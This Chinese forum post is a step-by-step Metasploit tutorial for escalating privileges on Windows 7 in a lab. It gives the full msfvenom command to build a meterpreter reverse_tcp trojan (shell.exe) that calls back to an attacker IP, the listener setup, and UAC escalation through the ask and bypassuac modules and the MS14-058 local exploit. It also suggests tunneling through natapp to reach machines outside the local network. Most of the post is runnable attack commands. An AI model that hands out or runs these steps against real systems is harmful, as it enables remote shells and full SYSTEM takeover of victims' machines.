本帖最后由 zhaorong 于 2021-1-9 17:29 编辑
1.
刚和对象分手,吃完一碗泡面,就来和各位表哥们吹牛皮了,因为表哥们比对象重要哈哈哈哈;
别喷弟弟,由于实验实在本地进行,所以需要各位看官搭建环境。
2.
实验材料|:
1.win7x64虚拟机一台
2.kali一台
3.接下来全靠吹牛皮
3.
在我们拿到一个低权限的shell之后,我们需要提权,所以此篇文章就是针对这种情况的屁话不多
搭建好两台虚拟机之后就可以开始了。
3.1直接提权
我们首先需要制作一个马,先查看kali的ip,我这里是192.168.199.129
使用msfVENOM制作一个马,使用刚刚得到的ip,输入命令
msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.199.129
lport=4444 -f exe x> shell.exe
我解读一下使用msfvenom,制作x64位的win木马,使用windows/x64/meterpreter_reverse_tcp模块
监听主机为192.168.199.129,监听端口为4444.输出格式为exe可执行文件
输出名字为shell.exe,各位表哥看着输入命令
可以看到木马制作成功,接下来就是发送给靶机运行即可。
注:
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序
并在目标机上执行,在本地监听上线4
使用msfcosole,命令
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.199.129
set lport 4444
exploit
可以看到成功监听。接下来靶机运行之前生成的木马即可拿到shell
已经可以看到sessions了,成功拿到shell,但是此时我们仅仅只是一个管理员权限 我们当然需要system权限
3.1.1
此时进入我们的exploit/windows/local/ask来提权,
输入命令use exploit/windows/local/ask进入该模块,此时只有一个sessions id为1
使用命令 set session 1
set filename qq.exe
exploit
(此时uac会在win7弹出一个窗口,我们选择是)
即可看到成功获取system,此时我们进入shell 输入whoami 成功拿到system权限
这种提权方式是提高程序运行级别来提高权限。
注意:以上过程需要kali和win7处在同一个局域网中如果不在一个局域网
就需要内网穿透内网穿透简单来说就是将
内网外网通过natapp隧道打通,让内网的数据让外网可以获取
3.1.2
绕过uac提权
我们需要使用use exploit/windows/local/bypassuac模块来绕过uac策略
使用background返回到msf
命令:background
use exploit/windows/local/bypassuac
sessions
set session 6
exploit即可成功
输入sessions即可看到重新生成了许多session,此时我们只需要选择一个session进入会话getsystem即可。
这种提权方法比第一种更好,没有与用户交互的过程,当用户有
一定安全基础时第一种方法可能会失效
3.1.3
使用提权漏洞进行提权,先讲之前的session全部清空
留下一个admin权限的session
因为windows本地提权漏洞挺多的,所以我选择一个来举例子,其实都可以去试一下
首先进入exploit/windows/local/ms14_058_track_popup_menu模块
输入命令set session 1
exploit
即可执行直接获取system的session |